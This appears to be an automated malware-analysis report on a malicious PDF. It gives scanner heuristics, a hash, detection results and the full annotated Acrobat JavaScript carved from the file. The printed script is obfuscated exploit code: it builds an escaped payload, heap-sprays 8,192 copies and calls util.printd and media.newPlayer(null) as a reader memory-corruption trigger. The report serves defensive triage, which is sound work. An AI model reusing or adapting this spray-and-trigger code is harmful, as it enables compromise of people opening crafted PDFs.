MALICIOUS
148
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell — NOTE(review): this mapping is not supported by the visible artifact. The extracted code is Acrobat/Reader JavaScript (T1059.007 JavaScript) and the preview contains no PowerShell strings; the decoded payload (`Wo`) is not shown, so a PowerShell stage can neither be confirmed nor excluded. Confirm against the decoded shellcode before keeping T1059.001.
The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics, and the PDF_UNESCAPE heuristic flags %u-escape decoding. The extracted script (below) reassembles a payload from thirty arrays (W1o000–W1o029, defined elsewhere in the document and not present in this stream) into a %uXXXX-escaped string with each adjacent character pair swapped, decodes it with unescape(), pads it with a repeated 0x3727/0x27f5 filler to exactly 32,768 characters, and stores 0x2000 copies in an array — a heap spray. It then calls util.printd() with a malformed format string and this.media.newPlayer(null) inside a try/catch, which is a trigger pattern for a memory-corruption bug in the reader's JavaScript API rather than a downloader. The script itself contains no network or download call; whether the sprayed shellcode fetches a second-stage payload cannot be determined without decoding the W1o* arrays. Note that embedded JavaScript alone is not a strong indicator of malice (benign forms use it routinely, as the low-severity heuristics below state); the verdict rests on the spray-plus-trigger combination.
Machine Learning
- Nyx PDF Classifier malicious score 0.9999
Heuristics 4
-
JavaScript action — low — 2 related findings — PDF_JAVASCRIPT: PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster — critical — PDF_JS_EXPLOIT_CLUSTER: PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior. Matched line in script:
/*9v6ZZ8Na*/for/*s<2jF795Rm|[X0*/(i=0/*u24AErC7C*/;i<W1o029.length/*N1zwY*/;){WoA=WoA+'%'/*IKzm<[j<RL@2*/+'u'+W1o029/*R\>*/[i+1]+/*fkb*/W1o029/*Dh:B*/[i]; i=i+2;} var Wo = unescape(WoA); var yR = unescape('%u3727%u27f5'); -
Embedded JS stream — low — PDF_JS: PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact — info — EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| javascript_obj0005_000.js | pdf-javascript-stream | PDF /JS object 5 at offset 0x156 | 5320 bytes |

SHA-256: f2bc59b2257fb764227f8106e725325c4482f5638c00ab134b6bf2e634027d52
Detection
ClamAV: No threats found (signature-based; a miss here does not contradict the heuristic verdict — the payload is %u-escaped and comment-obfuscated, and the W1o* data arrays are not in this stream).
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script — first 1,000 lines of the extracted script. Analyst note: the script references W1o000–W1o029, which are not defined in this stream; they are presumably held in another object of the PDF and must be recovered to decode the payload.
// Analyst annotation of extracted Acrobat/Reader JavaScript (PDF /JS object 5).
// DO NOT EXECUTE. Code below is byte-identical to the carved stream; only
// these line comments were added. The junk /*...*/ comments inside the
// statements are part of the original obfuscation and are left untouched.
//
// Inputs not present in this stream: W1o000 .. W1o029 (indexable sequences,
// presumably strings of hex digits) — defined elsewhere in the PDF; verify.
// Implicit globals created: WoA, Wo, yR, memory, i.

// Accumulator for a %uXXXX-escaped string built from the W1o* arrays.
var WoA="";
// Thirty identical loops, one per W1o* array. Each walks the array two
// elements at a time and appends '%u' + element[i+1] + element[i], i.e. each
// adjacent pair is swapped before decoding. Net effect: WoA = '%u' + pairs
// from W1o000, then W1o001, ... W1o029. The loops use a bare `for(...;...;)`
// with the increment `i=i+2` inside the body.
/*yiS<s`3NaNON*/for/*u\^`\Yx_E?i*/(i=0/*XCQG_et9w*/;i<W1o000.length/*qf853*/;){WoA=WoA+'%'/*0qXeZy`[nD*/+'u'+W1o000/*6Gz*/[i+1]+/*j:PiR*/W1o000/*eZr@Ua*/[i]; i=i+2;}
/*{|8<4>as`;v7K*/for/*v`61hcC5v0@Iz*/(i=0/*Hp<gB1aVM>Aw*/;i<W1o001.length/*ugd`q*/;){WoA=WoA+'%'/*LhXKbmqBy4*/+'u'+W1o001/*29J*/[i+1]+/*i<\mH8OWM*/W1o001/*@]s1c7*/[i]; i=i+2;}
/*<:FJ7?QT*/for/*DN^f<RU7T?J4\2*/(i=0/*EfZPrVh2[OmG*/;i<W1o002.length/*N8h2tn*/;){WoA=WoA+'%'/*TV={ih@i*/+'u'+W1o002/*QiQx*/[i+1]+/*W1*/W1o002/*bH7OUz\*/[i]; i=i+2;}
/*Y@[KG6zuoa=Q*/for/*T9hWg2kiU7IqqM*/(i=0/*bS]9_M2J_a*/;i<W1o003.length/*0|3*/;){WoA=WoA+'%'/*v7:GBv*/+'u'+W1o003/*K0VK*/[i+1]+/**/W1o003/*@AGhzZ*/[i]; i=i+2;}
/*bl|xYkb\mOEe5q*/for/*rGkc;hKw{sXX6]A*/(i=0/*gml2hPUi0fbt8*/;i<W1o004.length/*5Grl*/;){WoA=WoA+'%'/*Ho`s*/+'u'+W1o004/*R<yO*/[i+1]+/*J6R<|e*/W1o004/*]8GhC*/[i]; i=i+2;}
/*fw*/for/*4gBc]R<VjVw\EOD*/(i=0/*`2n[^Mwb*/;i<W1o005.length/*Y|wZ>_=*/;){WoA=WoA+'%'/*hUH5*/+'u'+W1o005/*D{AN*/[i+1]+/**/W1o005/*{lH[*/[i]; i=i+2;}
/*?p*/for/*3@k_0k\zKCuvj9_*/(i=0/*2{s45:<SQLD*/;i<W1o006.length/*f<hVZP*/;){WoA=WoA+'%'/*O7T<@{[X3n*/+'u'+W1o006/*[OpC*/[i+1]+/**/W1o006/*OV4e*/[i]; i=i+2;}
/*i64cESIWzAZ*/for/*ouR?q?RFg@dlt*/(i=0/*QCbk8SK]ro_Y*/;i<W1o007.length/*<KRKHt*/;){WoA=WoA+'%'/*PWx{v>mg3eOQ*/+'u'+W1o007/*ePT8*/[i+1]+/*hV*/W1o007/*N;3*/[i]; i=i+2;}
/*t2\3Fuuhc^B]w9*/for/*HGHUT>9SmC]PKh*/(i=0/*evu7h{xVg{\*/;i<W1o008.length/*eaLdOY*/;){WoA=WoA+'%'/*=E4D_Y*/+'u'+W1o008/*1TDf*/[i+1]+/*NHI1^*/W1o008/*a?6D\0*/[i]; i=i+2;}
/*2;m0CQEa*/for/*vmoAr_]E5SM{*/(i=0/*rA_@LIj*/;i<W1o009.length/*EE_{*/;){WoA=WoA+'%'/*9EJ;*/+'u'+W1o009/*LLz*/[i+1]+/*9I*/W1o009/*?fH*/[i]; i=i+2;}
/*j2fn`Y0MBh2:3t*/for/*fFZLi\I4YNu*/(i=0/*H8SKImFBw62*/;i<W1o010.length/*Na3uvl*/;){WoA=WoA+'%'/*Kr7*/+'u'+W1o010/*aey*/[i+1]+/*bZspX*/W1o010/*_{t5*/[i]; i=i+2;}
/*1R[q=8s\uD*/for/*5LPmHl?CyN>*/(i=0/*cyJ]9VaJ>||*/;i<W1o011.length/*BDvZw2*/;){WoA=WoA+'%'/*\7[*/+'u'+W1o011/*v:[*/[i+1]+/*6DITz5*/W1o011/*p4*/[i]; i=i+2;}
/*|ebmJl*/for/*c4<>P<JUUIW*/(i=0/*S9EqT62:;<vI*/;i<W1o012.length/*0;FAW*/;){WoA=WoA+'%'/*D4guV{*/+'u'+W1o012/*Te^B*/[i+1]+/*Z65Z?of_*/W1o012/*n<@z@qS*/[i]; i=i+2;}
/*Jq5mN6*/for/*Jz[RRalBZXBDlW*/(i=0/*uKC\:l0_|<I8*/;i<W1o013.length/*5a8lI*/;){WoA=WoA+'%'/*U>K*/+'u'+W1o013/*q;g:*/[i+1]+/*n8y\|:r*/W1o013/*8kRw*/[i]; i=i+2;}
/**/for/*@=Q3PM=h6y>*/(i=0/*W_a;Wj1MA*/;i<W1o014.length/*4sS*/;){WoA=WoA+'%'/*CE]5FhiA*/+'u'+W1o014/*yLx*/[i+1]+/*dE?G*/W1o014/*<9Ja3*/[i]; i=i+2;}
/*z84?V1;^*/for/*hDJQURCvI3gHUr*/(i=0/*FISlVg\*/;i<W1o015.length/*ZK9*/;){WoA=WoA+'%'/*fE??i*/+'u'+W1o015/*dl2*/[i+1]+/*l8`fC*/W1o015/*medv*/[i]; i=i+2;}
/*wu{|EZp6*/for/*3L]TI_Ax<S6*/(i=0/*s_5]cke*/;i<W1o016.length/*GaEt2js*/;){WoA=WoA+'%'/*gJhgc*/+'u'+W1o016/*mkzB*/[i+1]+/*s3*/W1o016/*Zsd*/[i]; i=i+2;}
/*66_5*/for/*{THtlV\WoNS*/(i=0/*LtvV9PLN8*/;i<W1o017.length/*xfdR8Lb*/;){WoA=WoA+'%'/*HqHwNF<*/+'u'+W1o017/*x76l*/[i+1]+/*A<v|q5=]*/W1o017/*Y?UFB*/[i]; i=i+2;}
/*N^r=^HZ[NL9*/for/*{WD@9:9mzKuZF*/(i=0/*rL<|X7RM2[*/;i<W1o018.length/*zKgQ{`*/;){WoA=WoA+'%'/*Cjh6*/+'u'+W1o018/*L^1*/[i+1]+/*v*/W1o018/*GLz*/[i]; i=i+2;}
/*l>w{s4mCfL2*/for/*koEBa@QlroogR1q*/(i=0/*E||VbBe|*/;i<W1o019.length/*M;{X]*/;){WoA=WoA+'%'/*h@p5*/+'u'+W1o019/*s?[l*/[i+1]+/*g*/W1o019/*En*/[i]; i=i+2;}
/*XaAEjlSj[Yp{Q3*/for/*@sv:1hAiI1vQikB*/(i=0/*jYPgToWRX5*/;i<W1o020.length/*f6AQt*/;){WoA=WoA+'%'/*anO*/+'u'+W1o020/*U`7*/[i+1]+/*aWQ657Q*/W1o020/*5O|S*/[i]; i=i+2;}
/*xp*/for/*PfF]SZ?70unJa*/(i=0/*WUdFtAm8bP@*/;i<W1o021.length/*IBk*/;){WoA=WoA+'%'/*vgF79N*/+'u'+W1o021/*mOv*/[i+1]+/**/W1o021/*LL7uX:C*/[i]; i=i+2;}
/*bd?iMyG\1Ue62*/for/*N]e;FQ@hBdxZZ`a*/(i=0/*5uj2FpzrJUlE*/;i<W1o022.length/*;z<jF*/;){WoA=WoA+'%'/*yPPS2*/+'u'+W1o022/*K[w*/[i+1]+/*h:0W>7Yn*/W1o022/*CO3V*/[i]; i=i+2;}
/*318d7Kqe7S\UW>*/for/*cYK18R\Us04g5q*/(i=0/*Ec?u\`P5lW][*/;i<W1o023.length/*CQ_*/;){WoA=WoA+'%'/*3_QMqC*/+'u'+W1o023/*62T*/[i+1]+/*aQlxi^*/W1o023/*le*/[i]; i=i+2;}
/*yb3Fme7*/for/*E7P<6F?5uP1Jx*/(i=0/*pG8sY6Rw6p*/;i<W1o024.length/*VpLw*/;){WoA=WoA+'%'/*5rMquDM*/+'u'+W1o024/*lbl*/[i+1]+/*ZvX*/W1o024/*3>=*/[i]; i=i+2;}
/*[@sZFjy=W2:Wr*/for/*Q9\|W;3T:[:9:Q4*/(i=0/*Z60V6sNgMk=ln*/;i<W1o025.length/*ER7WnFC*/;){WoA=WoA+'%'/*iS[9^ZX:^k*/+'u'+W1o025/*9`?*/[i+1]+/*M2wVnfwt*/W1o025/*YaC7*/[i]; i=i+2;}
/*HD]bV7@xhmCR*/for/*HJ4[Ya:a|g>9*/(i=0/*VP|coT\X2>d*/;i<W1o026.length/*GgqV*/;){WoA=WoA+'%'/*jvmP_t5zK8t*/+'u'+W1o026/*y`Z*/[i+1]+/*0D92*/W1o026/*N0yR*/[i]; i=i+2;}
/*3bU3v?GwI*/for/*uHPG^>6z4l4;ac*/(i=0/*?JkKLnB:*/;i<W1o027.length/*M5D8AX*/;){WoA=WoA+'%'/*3bQUAMEbEC\*/+'u'+W1o027/*Lx9*/[i+1]+/*tO;i*/W1o027/*yMK?Jc]*/[i]; i=i+2;}
/*g>i|UPh5gFq*/for/*^gIUZ0eqxg18cdl*/(i=0/*wArlul8D*/;i<W1o028.length/*uos[?Xl*/;){WoA=WoA+'%'/*tA7adE:7z9x^*/+'u'+W1o028/*>fcU*/[i+1]+/**/W1o028/*zhT_QI*/[i]; i=i+2;}
/*9v6ZZ8Na*/for/*s<2jF795Rm|[X0*/(i=0/*u24AErC7C*/;i<W1o029.length/*N1zwY*/;){WoA=WoA+'%'/*IKzm<[j<RL@2*/+'u'+W1o029/*R\>*/[i+1]+/*fkb*/W1o029/*Dh:B*/[i]; i=i+2;}
// Decode the %u-escaped string into the payload. Each %uXXXX becomes one
// UTF-16 code unit, so Wo is the shellcode as a JS string (2 bytes/char).
// Its contents are unknown from this stream (depends on W1o*).
var Wo = unescape(WoA);
// Filler: two code units, 0x3727 and 0x27f5. Repeated below to form the
// slide that precedes the payload in every sprayed chunk (NOP-sled-style
// padding; the exact semantics of these bytes on the target architecture
// are not established by this script — confirm).
var yR = unescape('%u3727%u27f5');
// Double the filler 15 times: 2 * 2^15 = 65536 code units.
for(i=0;i<15;){yR+=yR;i ++;}
// Trim the filler so that yR + Wo is exactly 32768 code units (64 KiB) per chunk.
yR=yR.substring(0,32768 - Wo.length);
// Heap spray: keep 0x2000 (8192) copies of filler+payload reachable from a
// global array so they are not garbage collected. Each element is the same
// 32768-unit string; the aim is to make the payload land at a predictable
// address range before the trigger below.
memory=new Array();
for(i=0;i<0x2000;) {
memory[i]= yR + Wo; i ++;
}
// Trigger sequence. util.printd() is called with a malformed date-format
// string (digits where format specifiers are expected) and a Date; the
// return value is discarded, so the calls are for side effect only.
util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
// this.media.newPlayer(null) — the method name is split ('new'+'Player') to
// evade string matching, and any exception is swallowed, which is consistent
// with a crash/UAF trigger whose side effect (not result) matters. Pattern
// is commonly associated with the Adobe Reader media.newPlayer bug
// (CVE-2009-4324) — confirm against the targeted reader version.
try {var obj = this.media;obj['new'+'Player'](null);} catch(e) {}
// Third printd call after the trigger; plausibly part of the heap
// grooming/trigger sequence, exact role not determinable from this stream.
util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());